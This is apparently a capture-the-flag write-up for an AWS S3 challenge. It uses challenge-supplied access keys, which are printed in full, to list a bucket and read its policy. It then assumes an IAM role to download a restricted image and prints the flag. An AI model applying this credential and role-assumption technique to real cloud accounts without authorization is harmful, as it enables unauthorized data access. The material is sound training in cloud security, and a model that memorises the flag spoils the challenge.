Recently Updated
Cats in the Bucket
Challenge
There is a bucket full of cat images. One of them contains a flag. Go get it!
1
2
3
Bucket: cats-in-a-bucket
Access Key ID: AKIATZ2X44NMCEQW46PL
Secret Access Key: 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
Solution
We got a bucket name, so try a region:
When we visit http://cats-in-a-bucket.s3-website-eu-west-1.amazonaws.com/ we get the message
1
2
3
4
5
6
7
8
400 Bad Request
- Code: IncorrectEndpoint
- Message: The specified bucket exists in another region. Please direct requests to the specified endpoint.
- Endpoint: cats-in-a-bucket.s3-website.eu-central-1.amazonaws.com
- RequestId: FB490WD7T4HGKGVW
- HostId: 6O/1HC9Rkpbz7CTt0N9LdLU8HBDG4r+soXelEScHgHp+opFS5f+hrlJEFUEJdDlTJwu8gLhCK9U=
ok so we go to cats-in-a-bucket.s3-website.eu-central-1.amazonaws.com, and here we see
1
2
3
4
5
6
7
404 Not Found
- Code: NoSuchWebsiteConfiguration
- Message: The specified bucket does not have a website configuration
- BucketName: cats-in-a-bucket
- RequestId: PM3VWVHPJF5P9JKR
- HostId: jOkYruD+efHf1nGXz/NehA/fVQxgqYrbm8c+Ia/4nl+fAnhO8ldZK40Z6WJM/1BYRL/RU8ymw58=
so there is no website, but we got the right bucket, now what? We have the access keys
we use awscli for further exploration:
1
2
3
$ aws s3 ls s3://cats-in-a-bucket
An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
ok, let’s set up our credentials
1
2
3
4
5
$ aws configure
AWS Access Key ID [****************UWDA]: AKIATZ2X44NMCEQW46PL
AWS Secret Access Key [****************8Kup]: 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
Default region name [us-east-1]: eu-central-1
Default output format [None]:
and try again:
1
2
3
4
5
6
$ aws s3 ls s3://cats-in-a-bucket
2022-10-09 17:23:46 83709 cat1.jpg
2022-10-09 17:23:48 92350 cat2.jpg
2022-10-09 17:23:47 119214 cat3.jpg
2022-10-09 17:23:47 87112 cat4.jpg
ok, let’s download those files:
1
2
3
4
5
6
7
8
$ aws s3 cp s3://cats-in-a-bucket/cat1.jpg .
download: s3://cats-in-a-bucket/cat1.jpg to ./cat1.jpg
$ aws s3 cp s3://cats-in-a-bucket/cat2.jpg .
download: s3://cats-in-a-bucket/cat2.jpg to ./cat2.jpg
$ aws s3 cp s3://cats-in-a-bucket/cat3.jpg .
download: s3://cats-in-a-bucket/cat3.jpg to ./cat3.jpg
$ aws s3 cp s3://cats-in-a-bucket/cat4.jpg .
fatal error: An error occurred (403) when calling the HeadObject operation: Forbidden
We get 3 very cute cat pictures
but an error on the fourth image, hmm..
maybe an older version didnt have the restriction?
1
2
3
$ aws s3api list-object-versions --bucket cats-in-a-bucket
An error occurred (AccessDenied) when calling the ListObjectVersions operation: Access Denied
ok, let’s look at the policies that are set
1
$ aws s3api get-bucket-policy --bucket cats-in-a-bucket
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
{
"Statement": [
{
"Action": [
"s3:ListBucket",
"s3:GetBucketPolicy"
],
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::261640479576:user/misterbuttons"
},
"Resource": "arn:aws:s3:::cats-in-a-bucket"
},
{
"Action": "s3:GetObject",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::261640479576:user/misterbuttons"
},
"Resource": [
"arn:aws:s3:::cats-in-a-bucket/cat1.jpg",
"arn:aws:s3:::cats-in-a-bucket/cat2.jpg",
"arn:aws:s3:::cats-in-a-bucket/cat3.jpg"
]
},
{
"Action": "s3:ListBucket",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::261640479576:role/captainclaw"
},
"Resource": "arn:aws:s3:::cats-in-a-bucket"
},
{
"Action": "s3:GetObject",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::261640479576:role/captainclaw"
},
"Resource": "arn:aws:s3:::cats-in-a-bucket/cat4.jpg"
}
],
"Version": "2008-10-17"
}
ok, so cat4.jpg is only accessible for the captainclaw role. Let’s set that up:
in ~/.aws/config we set:
1
2
3
4
5
6
[default]
region = eu-central-1
[profile cat]
role_arn = arn:aws:iam::261640479576:role/captainclaw
source_profile = default
and try downloading again:
1
2
$ aws s3 cp --profile cat s3://cats-in-a-bucket/cat4.jpg .
download: s3://cats-in-a-bucket/cat4.jpg to ./cat4.jpg
whoo, success!
Flag
he2023{r013_assum3d_succ3ssfuLLy}